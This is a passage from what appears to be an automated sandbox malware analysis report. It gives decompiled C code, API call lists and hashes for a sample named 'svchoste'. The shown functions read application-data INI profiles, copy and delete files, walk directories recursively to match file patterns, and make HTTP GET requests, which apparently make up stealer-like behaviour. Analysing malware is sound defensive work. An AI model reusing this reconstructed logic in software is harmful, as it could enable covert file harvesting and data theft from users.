									_v4716 = _v4712 + 1;
									do {
										_v4717 =  *_v4712;
										_v4712 = _v4712 + 1;
										_t287 = _v4717;
									} while (_v4717 != 0);
									_v4724 = _v4712 - _v4716;
									_t172 =  *0xba2544; // 0x2d05f80
									_v4656 = E00B72D10(_v4652 + 1, _t172) + _v4724 + 3;
									_t213 =  *0xba2664; // 0x2d066e0
									_v4652 = E00B72D10(_v4656, _t213) - 3;
									 *_v4652 = 0;
									_push(E00B8C900(_t182, _t244, _t245, _v4656));
									_t241 =  *0xba26c4; // 0x2d06b50
									_push(_t241);
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t287);
									_push("\n\n");
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t287);
									_t258 = _t272 + 0x28;
									_v4644 = _v4652 + 1;
								}
								_push(_v4672);
								E00B75EA3(_t182, _t217, _t244, _t245, __eflags);
								_t258 = _t260 + 4;
							}
							_push(_v4660);
							E00B75EA3(_t182, _t217, _t244, _t245, __eflags);
						}
						_t122 =  *0xba2764();
					}
				}
				__eflags = _v12 ^ _t246;
				return E00B74354(_t122, _t182, _v12 ^ _t246, _t217, _t244, _t245);
			}

0x00b8cde0
0x00b8cde0
0x00b8cde0
0x00b8cde8
0x00b8cded
0x00b8cdf4
0x00b8ce06
0x00b8ce13
0x00b8ce20
0x00b8ce31
0x00b8ce38
0x00b8ce44
0x00b8ce4b
0x00b8ce51
0x00b8ce56
0x00b8ce5c
0x00b8ce61
0x00b8ce66
0x00b8ce69
0x00b8ce76
0x00b8ce7c
0x00b8ce7e
0x00b8ce91
0x00b8ce97
0x00b8cea1
0x00b8ceab
0x00b8ceb2
0x00b8ceb9
0x00b8cebe
0x00b8cec1
0x00b8cec7
0x00b8cece
0x00b8ced4
0x00b8ced6
0x00b8cede
0x00b8cedf
0x00b8ceed
0x00b8cef6
0x00b8cefc
0x00b8cf07
0x00b8cf21
0x00b8cf2d
0x00b8cf4a
0x00b8cf52
0x00b8cf59
0x00b8cf5f
0x00b8cf64
0x00b8cf67
0x00b8cf74
0x00b8cf7a
0x00b8cf7a
0x00b8cf81
0x00b8cf88
0x00b8cf8d
0x00b8cf90
0x00b8cf9d
0x00000000
0x00000000
0x00b8cfa3
0x00b8cfa8
0x00b8cfb7
0x00b8cfbd
0x00b8cfc5
0x00b8cfcb
0x00b8cfd2
0x00b8cfd2
0x00b8cfe7
0x00b8cff9
0x00b8cffd
0x00b8d003
0x00b8d01c
0x00b8d028
0x00b8d02e
0x00b8d02f
0x00b8d034
0x00b8d03b
0x00b8d03c
0x00b8d044
0x00b8d04f
0x00b8d050
0x00b8d05b
0x00b8d05c
0x00b8d062
0x00b8d069
0x00b8d06a
0x00b8d072
0x00b8d07d
0x00b8d07e
0x00b8d08c
0x00b8d08d
0x00b8d093
0x00b8d09a
0x00b8d09b
0x00b8d0a3
0x00b8d0ae
0x00b8d0af
0x00b8d0b4
0x00b8d0b7
0x00b8d0bd
0x00b8d0cc
0x00b8d0d2
0x00b8d0da
0x00b8d0e0
0x00b8d0e7
0x00b8d0e7
0x00b8d0fc
0x00b8d102
0x00b8d113
0x00b8d121
0x00b8d125
0x00b8d12b
0x00b8d143
0x00b8d14f
0x00b8d161
0x00b8d162
0x00b8d168
0x00b8d16f
0x00b8d170
0x00b8d178
0x00b8d183
0x00b8d184
0x00b8d189
0x00b8d18c
0x00b8d192
0x00b8d1a1
0x00b8d1a7
0x00b8d1af
0x00b8d1b5
0x00b8d1bc
0x00b8d1bc
0x00b8d1d1
0x00b8d1d7
0x00b8d1f9
0x00b8d1ff
0x00b8d218
0x00b8d224
0x00b8d236
0x00b8d237
0x00b8d23d
0x00b8d244
0x00b8d245
0x00b8d24d
0x00b8d258
0x00b8d259
0x00b8d25e
0x00b8d26a
0x00b8d26a
0x00b8d27b
0x00b8d27c
0x00b8d281
0x00b8d281
0x00b8d28a
0x00b8d28b
0x00b8d290
0x00b8d293
0x00b8d293
0x00b8ce76
0x00b8d29c
0x00b8d2a6

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B8CE06
__snprintf.LIBCMT ref: 00B8CE20
GetPrivateProfileSectionNamesA.KERNEL32(?,00001000,?), ref: 00B8CE38

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

_fseek.LIBCMT ref: 00B8CEDF
_fseek.LIBCMT ref: 00B8CF07

Part of subcall function 00B766BB: __lock_file.LIBCMT ref: 00B766FC
Part of subcall function 00B766BB: __fseek_nolock.LIBCMT ref: 00B7670D

__fread_nolock.LIBCMT ref: 00B8CF4A
_fprintf.LIBCMT ref: 00B8D03C
_fprintf.LIBCMT ref: 00B8D050
_fprintf.LIBCMT ref: 00B8D06A
_fprintf.LIBCMT ref: 00B8D07E
_fprintf.LIBCMT ref: 00B8D09B
_fprintf.LIBCMT ref: 00B8D0AF
_fprintf.LIBCMT ref: 00B8D170
_fprintf.LIBCMT ref: 00B8D184
_fprintf.LIBCMT ref: 00B8D245
_fprintf.LIBCMT ref: 00B8D259

Strings

, xrefs: 00B8CE6F

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _fprintf$_fseek$FolderNamesPathPrivateProfileSection__fread_nolock__fseek_nolock__fsopen__lock_file__snprintf
String ID:
API String ID: 964051248-3916222277
Opcode ID: b11be475a79e0164e7f90b522cd62dfc4ce595a74ff186e5ccb239d272054875
Instruction ID: 372b89d550c104b7e1a4ba6a5544027771140f6264e99af74f69d9782b0c53c0
Opcode Fuzzy Hash: b11be475a79e0164e7f90b522cd62dfc4ce595a74ff186e5ccb239d272054875
Instruction Fuzzy Hash: 59D14AB5E00218ABCB24EF68DC82ADEB7F5AB59300F0481D9E50DE7251D7359EA4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C0CA, Relevance: 19.6, APIs: 13, Instructions: 144COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 00B8C140
_fprintf.LIBCMT ref: 00B8C154
_fprintf.LIBCMT ref: 00B8C168

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

_fprintf.LIBCMT ref: 00B8C185
_fprintf.LIBCMT ref: 00B8C199
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B8C1C4
_fprintf.LIBCMT ref: 00B8C1DE
_fprintf.LIBCMT ref: 00B8C1F2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B8C21D
_fprintf.LIBCMT ref: 00B8C238
_fprintf.LIBCMT ref: 00B8C24C
_fprintf.LIBCMT ref: 00B8C2A7
_fprintf.LIBCMT ref: 00B8C2BB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B8C2F4
_fprintf.LIBCMT ref: 00B8C30F
_fprintf.LIBCMT ref: 00B8C323
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 00B8C389
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 00B8C407
_fprintf.LIBCMT ref: 00B8C41A
_fprintf.LIBCMT ref: 00B8C42E
_fprintf.LIBCMT ref: 00B8C44B
_fprintf.LIBCMT ref: 00B8C45F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B8C48A
_fprintf.LIBCMT ref: 00B8C4A5
_fprintf.LIBCMT ref: 00B8C4B9
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B8C4E4
_fprintf.LIBCMT ref: 00B8C4FE
_fprintf.LIBCMT ref: 00B8C512
_fprintf.LIBCMT ref: 00B8C56B
_fprintf.LIBCMT ref: 00B8C57F
FreeLibrary.KERNEL32(00000000), ref: 00B8C633

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _fprintf$ByteCharMultiWide$FreeLibrary__ftbuf__lock_file__output_l__stbuf
String ID:
API String ID: 2176516221-0
Opcode ID: 44584c84fab02eacb352ea997f326e9aee5c06902d7cde31b9ee33f6b1e0313a
Instruction ID: 5d17a95cd3e3acd702fd21230a7f09e0a2e315ebbd0816a4e815cdb3d2059396
Opcode Fuzzy Hash: 44584c84fab02eacb352ea997f326e9aee5c06902d7cde31b9ee33f6b1e0313a
Instruction Fuzzy Hash: 2951A3F1A01214ABEB64DB54CC82F9973B9AB58701F1081C8F61D672D1DA70EE81CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B92200, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 180
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B92200(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char _v56;
				char _v84;
				void* _v88;
				void _v92;
				void* _v96;
				void* _v100;
				int _v104;
				long _v108;
				char* _v112;
				intOrPtr _v116;
				signed int _t77;
				signed int _t78;
				long _t93;
				void* _t116;
				intOrPtr _t128;
				intOrPtr _t138;
				void* _t154;
				void* _t155;
				signed int _t156;
				void* _t160;

				_t155 = __esi;
				_t154 = __edi;
				_t116 = __ebx;
				_push(0xffffffff);
				_push(E00B96667);
				_push( *[fs:0x0]);
				_t77 =  *0xba01f4; // 0xac8b3e58
				_t78 = _t77 ^ _t156;
				_v28 = _t78;
				_push(_t78);
				 *[fs:0x0] =  &_v16;
				_v116 = __ecx;
				E00B711C0( &_v56, _a4);
				_v8 = 0;
				_v20 = E00B71EE0( &_v56, "http://", 0);
				_t160 = _v20 -  *0xb9d8c4; // 0xffffffff
				if(_t160 != 0) {
					E00B71B90( &_v56, _v20, 7);
				}
				_v20 = E00B71370( &_v56, 0x2f, 0);
				E00B71F30( &_v56,  &_v84, 0, _v20);
				_v8 = 1;
				E00B71B90( &_v56, 0, _v20);
				_v20 = 0;
				E00B71E10(_v116 + 0x44, 0x104, _a4, 0x103);
				_v24 = 0;
				if( *(_v116 + 0x38) != 0) {
					_v24 = _v24 | 0x00000003;
				}
				_t128 = _v116;
				_t150 =  *(_t128 + 0xc);
				_v88 = InternetOpenA( *(_t128 + 0xc), _v24,  *(_v116 + 0x38), 0, 0);
				if(_v88 != 0) {
					_v92 = 1;
					InternetSetOptionA(_v88, 0x41,  &_v92, 4);
					_t138 = _v116;
					_t150 =  *(_t138 + 0x3c);
					_v96 = InternetConnectA(_v88, E00B71330( &_v84), 0x50,  *(_t138 + 0x3c),  *(_v116 + 0x40), 3, 0, 1);
					if(_v96 != 0) {
						_v100 = HttpOpenRequestA(_v96, "GET", E00B71330( &_v56), 0, 0, 0, 0x400000, 1);
						if(_v100 != 0) {
							E00B917A0(_t116, _v116, _t154, _t155, _v100);
							_v104 = HttpSendRequestA(_v100, 0, 0, 0, 0);
							if(_v104 != 0) {
								_v20 = E00B91CF0(_t116, _v116, _t154, _t155, _v100);
							}
							_t150 = _v100;
							InternetCloseHandle(_v100);
						}
						InternetCloseHandle(_v96);
					}
					InternetCloseHandle(_v88);
				}
				if(_v20 <= 0) {
					_v112 = 0;
					_v8 = 0;
					E00B712D0( &_v84);
					_v8 = 0xffffffff;
					E00B712D0( &_v56);
					_t93 = _v112;
				} else {
					_v108 = 1;
					_v8 = 0;
					E00B712D0( &_v84);
					_v8 = 0xffffffff;
					E00B712D0( &_v56);
					_t93 = _v108;
				}
				 *[fs:0x0] = _v16;
				return E00B74354(_t93, _t116, _v28 ^ _t156, _t150, _t154, _t155);
			}

0x00b92200
0x00b92200
0x00b92200
0x00b92203
0x00b92205
0x00b92210
0x00b92214
0x00b92219
0x00b9221b
0x00b9221e
0x00b92222
0x00b92228
0x00b92232
0x00b92237
0x00b9224d
0x00b92253
0x00b92259
0x00b92264
0x00b92264
0x00b92275
0x00b92285
0x00b9228a
0x00b92297
0x00b9229c
0x00b922b8
0x00b922c0
0x00b922ce
0x00b922d6
0x00b922d6
0x00b922e8
0x00b922eb
0x00b922f5
0x00b922fc
0x00b92302
0x00b92315
0x00b92328
0x00b9232b
0x00b92344
0x00b9234b
0x00b92372
0x00b92379
0x00b92382
0x00b92399
0x00b923a0
0x00b923ae
0x00b923ae
0x00b923b1
0x00b923b5
0x00b923b5
0x00b923bf
0x00b923bf
0x00b923c9
0x00b923c9
0x00b923d3
0x00b923fe
0x00b92405
0x00b9240c
0x00b92411
0x00b9241b
0x00b92420
0x00b923d5
0x00b923d5
0x00b923dc
0x00b923e3
0x00b923e8
0x00b923f2
0x00b923f7
0x00b923f7
0x00b92443
0x00b92458

APIs

__mbstowcs_l.LIBCMTD ref: 00B922B8
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 00B922EF
InternetSetOptionA.WININET(00000000,00000041,00000001,00000004), ref: 00B92315
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 00B9233E
HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,00400000,00000001), ref: 00B9236C
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B92393
InternetCloseHandle.WININET(00000000), ref: 00B923B5
InternetCloseHandle.WININET(00000000), ref: 00B923BF
InternetCloseHandle.WININET(00000000), ref: 00B923C9

Part of subcall function 00B91CF0: InternetSetFilePointer.WININET(00B9280B,00000000,00000000,00000000,00000000), ref: 00B91D94
Part of subcall function 00B91CF0: InternetReadFile.WININET(00B9280B,?,000003E8,00000000), ref: 00B91DBA

Strings

http://, xrefs: 00B92240
GET, xrefs: 00B92363

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenRequest$ConnectOptionPointerReadSend__mbstowcs_l
String ID: GET$http://
API String ID: 3227830049-1632879366
Opcode ID: 2975cb08a982fc3bf2bad862ddc61ae96ca479cffd45a1185ec5433e930a6d14
Instruction ID: ac1942aef4abeddd71c458f0aa7bf5c0d9d9720b78a59608f71c9653b19b8b2f
Opcode Fuzzy Hash: 2975cb08a982fc3bf2bad862ddc61ae96ca479cffd45a1185ec5433e930a6d14
Instruction Fuzzy Hash: 7271F470A00208AFDB14DBE8CD96BEEB7B5BF04700F204568F516AB2D5DBB46A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BB00, Relevance: 18.3, APIs: 12, Instructions: 257stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00B8BB1F
lstrcat.KERNEL32(?,02D066F0), ref: 00B8BB33
CopyFileA.KERNEL32(?,?,00000001), ref: 00B8BB46
_memset.LIBCMT ref: 00B8BB5A
wsprintfA.USER32 ref: 00B8BB78
DeleteFileA.KERNEL32(?), ref: 00B8BECC

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

lstrcat.KERNEL32(?,02D06710), ref: 00B8BD45
lstrcat.KERNEL32(?,02D067F0), ref: 00B8BD65
lstrcat.KERNEL32(?,02D06710), ref: 00B8BE16
lstrcat.KERNEL32(?,02D067F0), ref: 00B8BE36
_fprintf.LIBCMT ref: 00B8BE7B
_fprintf.LIBCMT ref: 00B8BE8F

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
String ID:
API String ID: 3836584492-0
Opcode ID: 9c2c8aa95d9c3e054133082337b21f7d87048353e3652699da395d05f5cc7dad
Instruction ID: 1ed38f161843ee939cbacdf34a57f49d2039d7d453947b24bf1be58666ba356b
Opcode Fuzzy Hash: 9c2c8aa95d9c3e054133082337b21f7d87048353e3652699da395d05f5cc7dad
Instruction Fuzzy Hash: B3B13FB1E00258AFCB24DFA8DC89BAAB7B5EF49301F1481D8E509A7251DB359F84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B90A30, Relevance: 18.1, APIs: 12, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00B90A30(void* __ebx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v20276;
				char _v20540;
				CHAR* _v20544;
				char _v20548;
				intOrPtr _v20552;
				signed int _t36;
				CHAR* _t45;
				CHAR* _t52;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t82;

				_t75 = __esi;
				_t74 = __edi;
				_t60 = __ebx;
				E00B82A40(0x5044);
				_t36 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t36 ^ _t76;
				E00B791C0( &_v20276, 0, 0x4e20);
				E00B791C0( &_v276, 0, 0x104);
				E00B791C0( &_v20540, 0, 0x104);
				wsprintfA( &_v20276, _a4);
				_t71 =  &_v20548;
				_t45 = E00B7540F(__ebx,  &_v20548, __edi,  &_v20276, ";",  &_v20548);
				_t82 = _t77 + 0x38;
				_v20544 = _t45;
				_v8 = 1;
				while(_v20544 != 0) {
					_v20552 = _v8;
					if(_v20552 == 1) {
						_t71 = _v20544;
						wsprintfA( &_v276, _v20544);
						_t82 = _t82 + 8;
					} else {
						if(_v20552 == 2) {
							_t71 =  &_v20540;
							wsprintfA( &_v20540, _v20544);
							_t82 = _t82 + 8;
						} else {
							if(_v20552 == 3) {
								E00B907B0(_t60, _t74, _t75,  &_v276,  &_v20540, _v20544);
								E00B791C0( &_v276, 0, 0x104);
								E00B791C0( &_v20540, 0, 0x104);
								_t82 = _t82 + 0x24;
								_t71 = _a8;
								SetCurrentDirectoryA(_a8);
								_v8 = 0;
							}
						}
					}
					_v8 = _v8 + 1;
					_t52 = E00B7540F(_t60, _t71, _t74, 0, ";",  &_v20548);
					_t82 = _t82 + 0xc;
					_v20544 = _t52;
				}
				return E00B74354(E00B791C0( &_v20276, 0, 0x4e20), _t60, _v12 ^ _t76,  &_v20276, _t74, _t75);
			}

0x00b90a30
0x00b90a30
0x00b90a30
0x00b90a38
0x00b90a3d
0x00b90a44
0x00b90a55
0x00b90a6b
0x00b90a81
0x00b90a94
0x00b90a9d
0x00b90ab0
0x00b90ab5
0x00b90ab8
0x00b90abe
0x00b90ac5
0x00b90ad5
0x00b90ae2
0x00b90afb
0x00b90b09
0x00b90b0f
0x00b90ae4
0x00b90aeb
0x00b90b1b
0x00b90b22
0x00b90b28
0x00b90aed
0x00b90af4
0x00b90b42
0x00b90b58
0x00b90b6e
0x00b90b73
0x00b90b76
0x00b90b7a
0x00b90b80
0x00b90b80
0x00b90af4
0x00b90aeb
0x00b90b8d
0x00b90b9e
0x00b90ba3
0x00b90ba6
0x00b90ba6
0x00b90bd4

APIs

_memset.LIBCMT ref: 00B90A55
_memset.LIBCMT ref: 00B90A6B
_memset.LIBCMT ref: 00B90A81
wsprintfA.USER32 ref: 00B90A94
_strtok_s.LIBCMT ref: 00B90AB0
wsprintfA.USER32 ref: 00B90B09
wsprintfA.USER32 ref: 00B90B22
_strtok_s.LIBCMT ref: 00B90B9E
_memset.LIBCMT ref: 00B90BBF

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _memset$wsprintf$_strtok_s
String ID:
API String ID: 2217037046-0
Opcode ID: c43c63c2e08df618d46846c91ce3438d79f55287607dabac2536d414c5dde29e
Instruction ID: 49fb3bfbf0209c241905038fef3f9b46f316fe9289b291b2735e50c53d5e35fd
Opcode Fuzzy Hash: c43c63c2e08df618d46846c91ce3438d79f55287607dabac2536d414c5dde29e
Instruction Fuzzy Hash: 444154B1D10218ABDF14EB54DC86BEE73B8AF44709F0444E9E70D6A181EA745B98CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B902A0, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B902A0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, char* _a4, intOrPtr _a8, CHAR* _a12, char* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				intOrPtr _v284;
				char _v844;
				char* _v848;
				char* _v852;
				char _v853;
				char _v854;
				char* _v860;
				char* _v864;
				intOrPtr* _v868;
				char* _v872;
				char _v873;
				char _v874;
				char* _v880;
				char* _v884;
				signed int _t76;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t87;
				int _t91;
				char* _t94;
				char* _t95;
				signed int _t108;
				char _t111;
				char _t112;
				char _t113;
				char _t114;
				signed int _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t141;

				_t133 = __esi;
				_t132 = __edi;
				_t115 = __edx;
				_t100 = __ebx;
				_t76 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t76 ^ _t134;
				SetCurrentDirectoryA(_a12);
				_t101 = _a12;
				_t80 = E00B8FB40(__ebx, _t115, __edi, __esi, _a12);
				_t136 = _t135 + 4;
				_v284 = _t80;
				if(_v284 == 0) {
					L28:
					__eflags = _v12 ^ _t134;
					return E00B74354(_t80, _t100, _v12 ^ _t134, _t115, _t132, _t133);
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t82 = E00B8FB20(_t101, _v284);
					_t137 = _t136 + 4;
					_v8 = _t82;
					if(_v8 == 0) {
						break;
					}
					E00B791C0( &_v844, 0, 0x104);
					wsprintfA( &_v844, "%s\\%s", _a12, _v8 + 0x14);
					_t87 = E00B752FA(_t133, _a8, 0xb994cd);
					_t141 = _t137 + 0x24;
					if(_t87 != 0) {
						_t108 = _v8 + 0x14;
						__eflags = _t108;
						wsprintfA( &_v276, "%s\\%s", _a8, _t108);
						_t136 = _t141 + 0x10;
					} else {
						wsprintfA( &_v276, "%s", _v8 + 0x14);
						_t136 = _t141 + 0xc;
					}
					if( *((intOrPtr*)(_v8 + 0x10)) != 0x4000) {
						_t101 = _v8 + 0x14;
						_t91 = PathMatchSpecA(_v8 + 0x14, _a16);
						__eflags = _t91;
						if(_t91 != 0) {
							_t101 = _a4;
							E00B89580(_a4,  &_v276,  &_v844);
							_t136 = _t136 + 0xc;
						}
						goto L26;
					} else {
						_v848 = ".";
						_v852 = _v8 + 0x14;
						while(1) {
							_t94 = _v852;
							_t111 =  *_t94;
							_v853 = _t111;
							if(_t111 !=  *_v848) {
								break;
							}
							if(_v853 == 0) {
								L11:
								_v860 = 0;
								L13:
								_t101 = _v860;
								_v864 = _v860;
								if(_v864 == 0) {
									L22:
									goto L1;
								}
								_v868 = "..";
								_v872 = _v8 + 0x14;
								while(1) {
									_t95 = _v872;
									_t112 =  *_t95;
									_v873 = _t112;
									if(_t112 !=  *_v868) {
										break;
									}
									if(_v873 == 0) {
										L19:
										_v880 = 0;
										L21:
										_t101 = _v880;
										_v884 = _v880;
										if(_v884 != 0) {
											_t101 =  &_v276;
											E00B902A0(_t100, _a4, _t132, _t133, __eflags, _a4,  &_v276,  &_v844, _a16);
											_t136 = _t136 + 0x10;
											L26:
											goto L1;
										}
										goto L22;
									}
									_t95 = _v872;
									_t113 = _t95[1];
									_v874 = _t113;
									_t54 = _v868 + 1; // 0x2c00002e
									if(_t113 !=  *_t54) {
										break;
									}
									_v872 =  &(_v872[2]);
									_v868 = _v868 + 2;
									if(_v874 != 0) {
										continue;
									}
									goto L19;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v880 = _t95;
								goto L21;
							}
							_t94 = _v852;
							_t114 = _t94[1];
							_v854 = _t114;
							_t32 =  &(_v848[1]); // 0x2e000000
							if(_t114 !=  *_t32) {
								break;
							}
							_v852 =  &(_v852[2]);
							_v848 =  &(_v848[2]);
							if(_v854 != 0) {
								continue;
							}
							goto L11;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v860 = _t94;
						goto L13;
					}
				}
				_t115 = _v284;
				_t80 = E00B8F970(_t101, _v284);
				goto L28;
			}

0x00b902a0
0x00b902a0
0x00b902a0
0x00b902a0
0x00b902a9
0x00b902b0
0x00b902b7
0x00b902bd
0x00b902c1
0x00b902c6
0x00b902c9
0x00b902d6
0x00b90525
0x00b90528
0x00b90532
0x00000000
0x00000000
0x00000000
0x00b902dc
0x00b902dc
0x00b902e3
0x00b902e8
0x00b902eb
0x00b902f2
0x00000000
0x00000000
0x00b90306
0x00b90325
0x00b90337
0x00b9033c
0x00b90341
0x00b90364
0x00b90364
0x00b90378
0x00b9037e
0x00b90343
0x00b90356
0x00b9035c
0x00b9035c
0x00b9038b
0x00b904e9
0x00b904ed
0x00b904f3
0x00b904f5
0x00b90505
0x00b90509
0x00b9050e
0x00b9050e
0x00000000
0x00b90391
0x00b90391
0x00b903a1
0x00b903a7
0x00b903a7
0x00b903ad
0x00b903af
0x00b903bd
0x00000000
0x00000000
0x00b903c6
0x00b903f9
0x00b903f9
0x00b90410
0x00b90410
0x00b90416
0x00b90423
0x00b904bd
0x00000000
0x00b904bd
0x00b90429
0x00b90439
0x00b9043f
0x00b9043f
0x00b90445
0x00b90447
0x00b90455
0x00000000
0x00000000
0x00b9045e
0x00b90491
0x00b90491
0x00b904a8
0x00b904a8
0x00b904ae
0x00b904bb
0x00b904cd
0x00b904d8
0x00b904dd
0x00b90511
0x00000000
0x00b90511
0x00000000
0x00b904bb
0x00b90460
0x00b90466
0x00b90469
0x00b90475
0x00b90478
0x00000000
0x00000000
0x00b9047a
0x00b90481
0x00b9048f
0x00000000
0x00000000
0x00000000
0x00b9048f
0x00b9049d
0x00b9049f
0x00b904a2
0x00000000
0x00b904a2
0x00b903c8
0x00b903ce
0x00b903d1
0x00b903dd
0x00b903e0
0x00000000
0x00000000
0x00b903e2
0x00b903e9
0x00b903f7
0x00000000
0x00000000
0x00000000
0x00b903f7
0x00b90405
0x00b90407
0x00b9040a
0x00000000
0x00b9040a
0x00b9038b
0x00b90516
0x00b9051d
0x00000000

APIs

SetCurrentDirectoryA.KERNEL32(?), ref: 00B902B7
_memset.LIBCMT ref: 00B90306
wsprintfA.USER32 ref: 00B90325
wsprintfA.USER32 ref: 00B90356
wsprintfA.USER32 ref: 00B90378
PathMatchSpecA.SHLWAPI(-00000014,?), ref: 00B904ED

Strings

%s\%s, xrefs: 00B90319
%s\%s, xrefs: 00B9036C

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: wsprintf$CurrentDirectoryMatchPathSpec_memset
String ID: %s\%s$%s\%s
API String ID: 512208171-3515709335
Opcode ID: 2ca5ac6bf259b6aa19feddafb8f581b22dffeb139c617739d6d07f689b681194
